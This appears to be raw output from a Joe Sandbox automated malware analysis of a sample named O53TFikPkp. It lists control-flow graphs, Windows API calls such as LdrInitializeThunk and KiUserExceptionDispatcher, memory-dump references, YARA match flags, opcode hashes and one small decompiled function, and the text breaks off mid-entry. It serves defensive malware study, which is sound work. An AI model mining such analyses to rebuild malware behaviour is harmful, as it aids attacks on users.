                                                                                            control_flow_graph 3505 71f138-71f23e 3522 71f240-71f281 3505->3522 3523 71f295-71f29f 3505->3523 3522->3523 3528 71f283-71f293 3522->3528 3526 71f2a5-71f2d5 call 71ed28 call 71d8d8 3523->3526 3535 71f2e5-71f692 3526->3535 3536 71f2d7-71fcbd 3526->3536 3528->3526 3575 71f698-71f6a5 3535->3575 3576 71fc7d-71fca0 3535->3576 3577 71fca5-71fcaf 3575->3577 3578 71f6ab-71f716 3575->3578 3576->3577 3578->3576 3589 71f71c-71f751 3578->3589 3592 71f753-71f778 3589->3592 3593 71f77a-71f782 3589->3593 3596 71f785-71f7ce call 71ed34 3592->3596 3593->3596 3602 71fc64-71fc6a 3596->3602 3603 71f7d4-71f82c call 71ed40 3596->3603 3602->3576 3604 71fc6c-71fc75 3602->3604 3603->3602 3611 71f832-71f83c 3603->3611 3604->3578 3605 71fc7b 3604->3605 3605->3577 3611->3602 3612 71f842-71f855 3611->3612 3612->3602 3613 71f85b-71f882 3612->3613 3617 71fc25-71fc48 3613->3617 3618 71f888-71f88b 3613->3618 3626 71fc4d-71fc53 3617->3626 3618->3617 3619 71f891-71f8cb LdrInitializeThunk 3618->3619 3629 71f8d1-71f920 3619->3629 3626->3576 3628 71fc55-71fc5e 3626->3628 3628->3602 3628->3613 3637 71fa65-71fa6b 3629->3637 3638 71f926-71f95f 3629->3638 3639 71fa79 3637->3639 3640 71fa6d-71fa6f 3637->3640 3642 71fa81-71fa87 3638->3642 3655 71f965-71f99b 3638->3655 3639->3642 3640->3639 3644 71fa95-71fa98 3642->3644 3645 71fa89-71fa8b 3642->3645 3647 71faa3-71faa9 3644->3647 3645->3644 3648 71fab7-71faba 3647->3648 3649 71faab-71faad 3647->3649 3651 71fa09-71fa39 call 71ed4c 3648->3651 3649->3648 3657 71fa3b-71fa5a 3651->3657 3661 71f9a1-71f9c4 3655->3661 3662 71fabf-71faed call 71ed58 3655->3662 3664 71fa60 3657->3664 3665 71faf2-71fb44 3657->3665 3661->3662 3672 71f9ca-71f9fd 3661->3672 3662->3657 3664->3626 3685 71fb46-71fb4c 3665->3685 3686 71fb4e-71fb54 3665->3686 3672->3647 3684 71fa03 3672->3684 3684->3651 3687 71fb65-71fb83 3685->3687 3688 71fb62 3686->3688 3689 71fb56-71fb58 3686->3689 3693 71fb85-71fb95 3687->3693 3694 71fba7-71fc23 3687->3694 3688->3687 3689->3688 3693->3694 3697 71fb97-71fba0 3693->3697 3694->3626 3697->3694
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8a34c79f85d374ac103f4f2d32d1e63358ebe80f67b8f694084ee5a1c463a35c
                                                                                            • Instruction ID: 831364511b16af52d8d1f069e426acdeb7b01b6563e22d6ee114c176c8b2127e
                                                                                            • Opcode Fuzzy Hash: 8a34c79f85d374ac103f4f2d32d1e63358ebe80f67b8f694084ee5a1c463a35c
                                                                                            • Instruction Fuzzy Hash: 9F62F971E007198BDB24EFB8C8546DDB7F1AF89300F1086A9D54AAB355EF349E85CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 4361 8ce200-8ce263 4362 8ce265-8ce28f 4361->4362 4363 8ce292-8ce2b0 4361->4363 4362->4363 4368 8ce2b9-8ce2f0 4363->4368 4369 8ce2b2-8ce2b4 4363->4369 4373 8ce2f6-8ce30a 4368->4373 4374 8ce721 4368->4374 4370 8ce772-8ce787 4369->4370 4375 8ce30c-8ce336 4373->4375 4376 8ce339-8ce358 4373->4376 4377 8ce726-8ce73c 4374->4377 4375->4376 4383 8ce35a-8ce360 4376->4383 4384 8ce370-8ce372 4376->4384 4377->4370 4388 8ce364-8ce366 4383->4388 4389 8ce362 4383->4389 4385 8ce374-8ce38c 4384->4385 4386 8ce391-8ce39a 4384->4386 4385->4377 4390 8ce3a2-8ce3a9 4386->4390 4388->4384 4389->4384 4391 8ce3ab-8ce3b1 4390->4391 4392 8ce3b3-8ce3ba 4390->4392 4393 8ce3c7-8ce3e4 call 8cdaa8 4391->4393 4394 8ce3bc-8ce3c2 4392->4394 4395 8ce3c4 4392->4395 4398 8ce539-8ce53d 4393->4398 4399 8ce3ea-8ce3f1 4393->4399 4394->4393 4395->4393 4400 8ce70c-8ce71f 4398->4400 4401 8ce543-8ce547 4398->4401 4399->4374 4402 8ce3f7-8ce434 4399->4402 4400->4377 4403 8ce549-8ce55c 4401->4403 4404 8ce561-8ce56a 4401->4404 4410 8ce43a-8ce43f 4402->4410 4411 8ce702-8ce706 4402->4411 4403->4377 4405 8ce56c-8ce596 4404->4405 4406 8ce599-8ce5a0 4404->4406 4405->4406 4408 8ce63f-8ce654 4406->4408 4409 8ce5a6-8ce5ad 4406->4409 4408->4411 4425 8ce65a-8ce65c 4408->4425 4415 8ce5dc-8ce5fe 4409->4415 4416 8ce5af-8ce5d9 4409->4416 4412 8ce471-8ce486 call 8cdacc 4410->4412 4413 8ce441-8ce44f call 8cdab4 4410->4413 4411->4390 4411->4400 4423 8ce48b-8ce48f 4412->4423 4413->4412 4426 8ce451-8ce46f call 8cdac0 4413->4426 4415->4408 4451 8ce600-8ce60a 4415->4451 4416->4415 4427 8ce500-8ce50d 4423->4427 4428 8ce491-8ce4a3 call 8cdad8 4423->4428 4429 8ce65e-8ce697 4425->4429 4430 8ce6a9-8ce6c6 call 8cdaa8 4425->4430 4426->4423 4427->4411 4443 8ce513-8ce51d call 8cdae8 4427->4443 4455 8ce4a5-8ce4d5 4428->4455 4456 8ce4e3-8ce4fb 4428->4456 4446 8ce699-8ce69f 4429->4446 4447 8ce6a0-8ce6a7 4429->4447 4430->4411 4442 8ce6c8-8ce6f4 WaitMessage 4430->4442 4448 8ce6fb 4442->4448 4449 8ce6f6 4442->4449 4457 8ce52c-8ce534 call 8cdb00 4443->4457 4458 8ce51f-8ce527 call 8cdaf4 4443->4458 4446->4447 4447->4411 4448->4411 4449->4448 4463 8ce60c-8ce612 4451->4463 4464 8ce622-8ce625 4451->4464 4468 8ce4dc 4455->4468 4469 8ce4d7 4455->4469 4456->4377 4457->4411 4458->4411 4466 8ce614 4463->4466 4467 8ce616-8ce618 4463->4467 4471 8ce62e-8ce63d 4464->4471 4466->4464 4467->4464 4468->4456 4469->4468 4471->4408 4471->4451
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923202403.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8c0000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb39c94df270a92158092d7b44c1192a014b1f595283ab4d72d0f8ffd8f6108a
                                                                                            • Instruction ID: 16946fb3a6eb26222385e6ad7c4d19c1ca66292bc6dafbf0f6bee9cc7d591367
                                                                                            • Opcode Fuzzy Hash: bb39c94df270a92158092d7b44c1192a014b1f595283ab4d72d0f8ffd8f6108a
                                                                                            • Instruction Fuzzy Hash: 70F11631A00219CFDB14DFA9C948F9EBBF2FF88308F158569E405AB2A5DB74E945CB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5ce7c3e5f2bb70a0d11ce057eb8041973a2ac4c3db0775c09a635be0642e4878
                                                                                            • Instruction ID: a79032fb326f2f2558057349b71cbb2d8e8a624b64762c7fb57ad03623cf88a9
                                                                                            • Opcode Fuzzy Hash: 5ce7c3e5f2bb70a0d11ce057eb8041973a2ac4c3db0775c09a635be0642e4878
                                                                                            • Instruction Fuzzy Hash: A8519F71A002059FCB14EBB4D858AAEB7B6FF84304B148929E512DB391EF70D845CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00401E1D() {
                                                                                            				_Unknown_base(*)()* _t1;
                                                                                            
                                                                                            				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                                                                            				return _t1;
                                                                                            			}




                                                                                            0x00401e22
                                                                                            0x00401e28

                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                                            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 8 710a70-710b36 KiUserExceptionDispatcher 397 710b36 call 467678 8->397 398 710b36 call 467688 8->398 399 710b36 call 467c08 8->399 17 710b3c-710bf4 402 710bf7 call 468960 17->402 403 710bf7 call 46895c 17->403 404 710bf7 call 4689dd 17->404 27 710bfd-710c1f 405 710c21 call 468b42 27->405 406 710c21 call 468b48 27->406 31 710c27-710c4a 407 710c4c call 468b42 31->407 408 710c4c call 468b48 31->408 35 710c52-710c75 366 710c77 call 468b42 35->366 367 710c77 call 468b48 35->367 39 710c7d-710ca0 370 710ca2 call 468b42 39->370 371 710ca2 call 468b48 39->371 43 710ca8-710ccb 372 710ccd call 468b42 43->372 373 710ccd call 468b48 43->373 47 710cd3-710d15 LdrInitializeThunk 48 711022 47->48 49 710d1b-710d3f 47->49 374 711022 call 4693b8 48->374 375 711022 call 469788 48->375 376 711022 call 4697e9 48->376 54 710d45 49->54 55 710e8b-710eaf 49->55 51 711028-71114c KiUserExceptionDispatcher 395 71114c call 46b837 51->395 396 71114c call 46b7d8 51->396 54->55 57 710d4b-710e86 54->57 65 710eb1 55->65 66 710eb5-710eb7 55->66 57->48 67 710eb3 65->67 68 710eb9 65->68 69 710ebe-710ee8 66->69 67->66 68->69 78 710eea 69->78 79 710eee-710ef0 69->79 81 710ef2 78->81 82 710eec 78->82 83 710ef7-710efd 79->83 81->83 82->79 83->48 85 710f03-710ffc 83->85 85->48 92 711152-711212 368 711212 call 46bf00 92->368 369 711212 call 46bce8 92->369 115 711218-711293 377 711293 call 46d457 115->377 378 711293 call 46da67 115->378 379 711293 call 46da08 115->379 380 711293 call 46dac8 115->380 131 711299-7112d8 384 7112d8 call 46db87 131->384 385 7112d8 call 46dac8 131->385 386 7112d8 call 46db28 131->386 387 7112d8 call 46dbe8 131->387 139 7112de-71131d 388 71131d call 46dbe8 139->388 389 71131d call 46dc48 139->389 146 711323-711378 390 711378 call 46e6f0 146->390 391 711378 call 46ea60 146->391 150 71137e-711441 392 711441 call 46f650 150->392 393 711441 call 46f700 150->393 394 711441 call 46f75f 150->394 159 711447-711489 400 711489 call 46f820 159->400 401 711489 call 46f8b0 159->401 162 71148f-711bbf KiUserExceptionDispatcher 239 711bc5-711be8 162->239 240 711ebb-711ecc 162->240 252 711ea3-711eb8 239->252 253 711bee-711c60 239->253 243 711ed2-711ed9 240->243 244 71222b-712232 240->244 246 711edf-711f31 243->246 247 711f6e-711f75 243->247 248 7122b4-7122be 244->248 249 712238-7122a9 244->249 381 711f37 call 8c09e0 246->381 382 711f37 call 8c09f0 246->382 383 711f37 call 8c0a80 246->383 254 7120e3-7120ea 247->254 255 711f7b-7120be 247->255 250 7122c0-7122fd 248->250 251 712304-712316 248->251 249->248 250->251 252->240 282 711c66-711c6d 253->282 283 711e8b-711e9d 253->283 254->244 258 7120f0-71220e 254->258 255->244 258->244 287 711c73-711d89 282->287 288 711d8e-711db9 282->288 283->252 283->253 287->283 288->283 292 711dbf-711e62 288->292 292->283 293 711f3d 293->244 366->39 367->39 368->115 369->115 370->43 371->43 372->47 373->47 374->51 375->51 376->51 377->131 378->131 379->131 380->131 381->293 382->293 383->293 384->139 385->139 386->139 387->139 388->146 389->146 390->150 391->150 392->159 393->159 394->159 395->92 396->92 397->17 398->17 399->17 400->162 401->162 402->27 403->27 404->27 405->31 406->31 407->35 408->35
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00710AB5
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2638914809-0
                                                                                            • Opcode ID: f6d1a0f636da1f258b1d3cc4afc1e1ddde065c3304d33209bb5bdb1a9f806088
                                                                                            • Instruction ID: 70befd4d80072870ac435839fa49da0f7c59883a73cdb16a136c2880489d83cc
                                                                                            • Opcode Fuzzy Hash: f6d1a0f636da1f258b1d3cc4afc1e1ddde065c3304d33209bb5bdb1a9f806088
                                                                                            • Instruction Fuzzy Hash: 5DA24A74A01228CFCB24EF64D95869DBBB6BF88306F1084E9D50AA3750DF349E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00710AB5
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2638914809-0
                                                                                            • Opcode ID: 5a6e6a834cc7fae8761b2fe4b33553509b8ce067f5b4eac3a9aa9d2ad7e834c0
                                                                                            • Instruction ID: 420b5ef6e4e799476f07ff52c7f35d0bf558ff428e79d0ba07b91918ccfdf0d6
                                                                                            • Opcode Fuzzy Hash: 5a6e6a834cc7fae8761b2fe4b33553509b8ce067f5b4eac3a9aa9d2ad7e834c0
                                                                                            • Instruction Fuzzy Hash: 54522B74A01229CFCB24DF64D95869DBBB6BF88306F5084E9D60AA7340CF359E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                                            • String ID:
                                                                                            • API String ID: 243558500-0
                                                                                            • Opcode ID: 546bc4dfa52425adb135831cf39fc8e924d6d34869d68ac1d2443c790badb65a
                                                                                            • Instruction ID: a7127a6e787fc0f71041c0d2b04333e4ec8350a6ce827fbbeb31067b67d16a5e
                                                                                            • Opcode Fuzzy Hash: 546bc4dfa52425adb135831cf39fc8e924d6d34869d68ac1d2443c790badb65a
                                                                                            • Instruction Fuzzy Hash: CD522A74A01229CFCB24DF64D95869DBBB6BF88306F5084E9D60AA7340CF359E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                                            • String ID:
                                                                                            • API String ID: 243558500-0
                                                                                            • Opcode ID: 407dd96906f8313eae6f57e2688545d43b002f0b1601f6d565f7fa7a199ffc8e
                                                                                            • Instruction ID: a75104ab6f7667cabe9051b299b2b60534608ef3d5b71a43d1f045d7895e227c
                                                                                            • Opcode Fuzzy Hash: 407dd96906f8313eae6f57e2688545d43b002f0b1601f6d565f7fa7a199ffc8e
                                                                                            • Instruction Fuzzy Hash: 55523B74A01229CFCB24DF64D95869CBBB6BF88306F5084E9D60AA7340CF349E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                                            • String ID:
                                                                                            • API String ID: 243558500-0
                                                                                            • Opcode ID: 8e09d1ba55ff4e42f87f163f33a6a3ff7af13415f7b22e4be7ae5509faf2eb4a
                                                                                            • Instruction ID: 8c0cb77f7863a42120d40301119eb8058d7e417c76adf019ec83c078170e3d30
                                                                                            • Opcode Fuzzy Hash: 8e09d1ba55ff4e42f87f163f33a6a3ff7af13415f7b22e4be7ae5509faf2eb4a
                                                                                            • Instruction Fuzzy Hash: 6E523B74A01269CFCB24DF64D95869DBBB6BF88306F5084E9D60AA7340CF349E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1995 710b9c-710bf4 2342 710bf7 call 468960 1995->2342 2343 710bf7 call 46895c 1995->2343 2344 710bf7 call 4689dd 1995->2344 2003 710bfd-710c1f 2345 710c21 call 468b42 2003->2345 2346 710c21 call 468b48 2003->2346 2007 710c27-710c4a 2347 710c4c call 468b42 2007->2347 2348 710c4c call 468b48 2007->2348 2011 710c52-710c75 2349 710c77 call 468b42 2011->2349 2350 710c77 call 468b48 2011->2350 2015 710c7d-710ca0 2353 710ca2 call 468b42 2015->2353 2354 710ca2 call 468b48 2015->2354 2019 710ca8-710ccb 2355 710ccd call 468b42 2019->2355 2356 710ccd call 468b48 2019->2356 2023 710cd3-710d15 LdrInitializeThunk 2024 711022 2023->2024 2025 710d1b-710d3f 2023->2025 2357 711022 call 4693b8 2024->2357 2358 711022 call 469788 2024->2358 2359 711022 call 4697e9 2024->2359 2030 710d45 2025->2030 2031 710e8b-710eaf 2025->2031 2027 711028-71114c KiUserExceptionDispatcher 2378 71114c call 46b837 2027->2378 2379 71114c call 46b7d8 2027->2379 2030->2031 2033 710d4b-710e86 2030->2033 2041 710eb1 2031->2041 2042 710eb5-710eb7 2031->2042 2033->2024 2043 710eb3 2041->2043 2044 710eb9 2041->2044 2045 710ebe-710ee8 2042->2045 2043->2042 2044->2045 2054 710eea 2045->2054 2055 710eee-710ef0 2045->2055 2057 710ef2 2054->2057 2058 710eec 2054->2058 2059 710ef7-710efd 2055->2059 2057->2059 2058->2055 2059->2024 2061 710f03-710ffc 2059->2061 2061->2024 2068 711152-711212 2351 711212 call 46bf00 2068->2351 2352 711212 call 46bce8 2068->2352 2091 711218-711293 2360 711293 call 46d457 2091->2360 2361 711293 call 46da67 2091->2361 2362 711293 call 46da08 2091->2362 2363 711293 call 46dac8 2091->2363 2107 711299-7112d8 2364 7112d8 call 46db87 2107->2364 2365 7112d8 call 46dac8 2107->2365 2366 7112d8 call 46db28 2107->2366 2367 7112d8 call 46dbe8 2107->2367 2115 7112de-71131d 2371 71131d call 46dbe8 2115->2371 2372 71131d call 46dc48 2115->2372 2122 711323-711378 2373 711378 call 46e6f0 2122->2373 2374 711378 call 46ea60 2122->2374 2126 71137e-711441 2375 711441 call 46f650 2126->2375 2376 711441 call 46f700 2126->2376 2377 711441 call 46f75f 2126->2377 2135 711447-711489 2380 711489 call 46f820 2135->2380 2381 711489 call 46f8b0 2135->2381 2138 71148f-711bbf KiUserExceptionDispatcher 2215 711bc5-711be8 2138->2215 2216 711ebb-711ecc 2138->2216 2228 711ea3-711eb8 2215->2228 2229 711bee-711c60 2215->2229 2219 711ed2-711ed9 2216->2219 2220 71222b-712232 2216->2220 2222 711edf-711f31 2219->2222 2223 711f6e-711f75 2219->2223 2224 7122b4-7122be 2220->2224 2225 712238-7122a9 2220->2225 2368 711f37 call 8c09e0 2222->2368 2369 711f37 call 8c09f0 2222->2369 2370 711f37 call 8c0a80 2222->2370 2230 7120e3-7120ea 2223->2230 2231 711f7b-7120be 2223->2231 2226 7122c0-7122fd 2224->2226 2227 712304-712316 2224->2227 2225->2224 2226->2227 2228->2216 2258 711c66-711c6d 2229->2258 2259 711e8b-711e9d 2229->2259 2230->2220 2234 7120f0-71220e 2230->2234 2231->2220 2234->2220 2263 711c73-711d89 2258->2263 2264 711d8e-711db9 2258->2264 2259->2228 2259->2229 2263->2259 2264->2259 2268 711dbf-711e62 2264->2268 2268->2259 2269 711f3d 2269->2220 2342->2003 2343->2003 2344->2003 2345->2007 2346->2007 2347->2011 2348->2011 2349->2015 2350->2015 2351->2091 2352->2091 2353->2019 2354->2019 2355->2023 2356->2023 2357->2027 2358->2027 2359->2027 2360->2107 2361->2107 2362->2107 2363->2107 2364->2115 2365->2115 2366->2115 2367->2115 2368->2269 2369->2269 2370->2269 2371->2122 2372->2122 2373->2126 2374->2126 2375->2135 2376->2135 2377->2135 2378->2068 2379->2068 2380->2138 2381->2138
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL ref: 00710CD6
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                                            • String ID:
                                                                                            • API String ID: 243558500-0
                                                                                            • Opcode ID: b5a5035c697a463b753df0489399ee96f305a4507cee3752f32ac51e7c56ad48
                                                                                            • Instruction ID: 3cf4c89b370ee478d4d79a276d887143ca8ba04ca80f2b6538bf9066e9264d5f
                                                                                            • Opcode Fuzzy Hash: b5a5035c697a463b753df0489399ee96f305a4507cee3752f32ac51e7c56ad48
                                                                                            • Instruction Fuzzy Hash: 2F523B74A01269CFCB24DF64D95869DBBB6BF88306F5084E9D60AA7340CF349E86CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2382 710ffe-711015 2384 71101d-711022 2382->2384 2656 711022 call 4693b8 2384->2656 2657 711022 call 469788 2384->2657 2658 711022 call 4697e9 2384->2658 2386 711028-71107f 2390 711086-7110ac 2386->2390 2392 7110b2-7110c4 2390->2392 2393 7110cb-711103 KiUserExceptionDispatcher 2392->2393 2395 71110d-71111f 2393->2395 2396 711126-71114c 2395->2396 2664 71114c call 46b837 2396->2664 2665 71114c call 46b7d8 2396->2665 2398 711152-711164 2399 71116b-711191 2398->2399 2401 711197-7111ee 2399->2401 2405 7111f5-711212 2401->2405 2639 711212 call 46bf00 2405->2639 2640 711212 call 46bce8 2405->2640 2407 711218-71122a 2408 711231-711257 2407->2408 2410 71125d-71126f 2408->2410 2411 711276-711293 2410->2411 2644 711293 call 46d457 2411->2644 2645 711293 call 46da67 2411->2645 2646 711293 call 46da08 2411->2646 2647 711293 call 46dac8 2411->2647 2413 711299-7112ab 2414 7112b2-7112d8 2413->2414 2648 7112d8 call 46db87 2414->2648 2649 7112d8 call 46dac8 2414->2649 2650 7112d8 call 46db28 2414->2650 2651 7112d8 call 46dbe8 2414->2651 2416 7112de-7112f0 2417 7112f7-71131d 2416->2417 2652 71131d call 46dbe8 2417->2652 2653 71131d call 46dc48 2417->2653 2419 711323-71134b 2421 711352-711378 2419->2421 2654 711378 call 46e6f0 2421->2654 2655 711378 call 46ea60 2421->2655 2423 71137e-711390 2424 711397-7113bd 2423->2424 2426 7113c3-7113d5 2424->2426 2427 7113dc-711405 2426->2427 2429 71140b-71141d 2427->2429 2430 711424-711441 2429->2430 2659 711441 call 46f650 2430->2659 2660 711441 call 46f700 2430->2660 2661 711441 call 46f75f 2430->2661 2432 711447-711459 2433 711460-711489 2432->2433 2662 711489 call 46f820 2433->2662 2663 711489 call 46f8b0 2433->2663 2435 71148f-7114e9 2439 7114f0-71150d 2435->2439 2441 711513-71156d 2439->2441 2445 711574-711591 2441->2445 2447 711597-7115a9 2445->2447 2448 7115b0-7115d9 2447->2448 2450 7115df-7115f1 2448->2450 2451 7115f8-711621 2450->2451 2453 711627-711639 2451->2453 2454 711640-711669 2453->2454 2456 71166f-711681 2454->2456 2457 711688-7116b1 2456->2457 2459 7116b7-7116c9 2457->2459 2460 7116d0-7116f9 2459->2460 2462 7116ff-711711 2460->2462 2463 711718-711741 2462->2463 2465 711747-711759 2463->2465 2466 711760-711789 2465->2466 2468 71178f-7117a1 2466->2468 2469 7117a8-7117d1 2468->2469 2471 7117d7-7117e9 2469->2471 2472 7117f0-711819 2471->2472 2474 71181f-711831 2472->2474 2475 711838-711861 2474->2475 2477 711867-711879 2475->2477 2478 711880-71189d 2477->2478 2480 7118a3-7118fd 2478->2480 2484 711904-71192d 2480->2484 2486 711933-711945 2484->2486 2487 71194c-711975 2486->2487 2489 71197b-71198d 2487->2489 2490 711994-7119bd 2489->2490 2492 7119c3-7119d5 2490->2492 2493 7119dc-711a05 2492->2493 2495 711a0b-711a1d 2493->2495 2496 711a24-711a95 KiUserExceptionDispatcher 2495->2496 2500 711a9b-711aad 2496->2500 2501 711ab4-711add 2500->2501 2503 711ae3-711af5 2501->2503 2504 711afc-711b25 2503->2504 2506 711b2b-711b3d 2504->2506 2507 711b44-711b6d 2506->2507 2509 711b73-711bbf 2507->2509 2512 711bc5-711be8 2509->2512 2513 711ebb-711ecc 2509->2513 2525 711ea3-711eb8 2512->2525 2526 711bee-711c60 2512->2526 2516 711ed2-711ed9 2513->2516 2517 71222b-712232 2513->2517 2519 711edf-711ee5 2516->2519 2520 711f6e-711f75 2516->2520 2521 7122b4-7122be 2517->2521 2522 712238-7122a9 2517->2522 2537 711eed 2519->2537 2527 7120e3-7120ea 2520->2527 2528 711f7b-7120be 2520->2528 2523 7122c0-7122ee 2521->2523 2524 712304-712316 2521->2524 2522->2521 2554 7122f5-7122fd 2523->2554 2525->2513 2555 711c66-711c6d 2526->2555 2556 711e8b-711e9d 2526->2556 2527->2517 2531 7120f0-71220e 2527->2531 2528->2517 2531->2517 2544 711ef9-711f16 2537->2544 2558 711f21-711f31 2544->2558 2554->2524 2560 711c73-711d89 2555->2560 2561 711d8e-711db9 2555->2561 2556->2525 2556->2526 2641 711f37 call 8c09e0 2558->2641 2642 711f37 call 8c09f0 2558->2642 2643 711f37 call 8c0a80 2558->2643 2560->2556 2561->2556 2565 711dbf-711e62 2561->2565 2565->2556 2566 711f3d 2566->2517 2639->2407 2640->2407 2641->2566 2642->2566 2643->2566 2644->2413 2645->2413 2646->2413 2647->2413 2648->2416 2649->2416 2650->2416 2651->2416 2652->2419 2653->2419 2654->2423 2655->2423 2656->2386 2657->2386 2658->2386 2659->2432 2660->2432 2661->2432 2662->2435 2663->2435 2664->2398 2665->2398
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
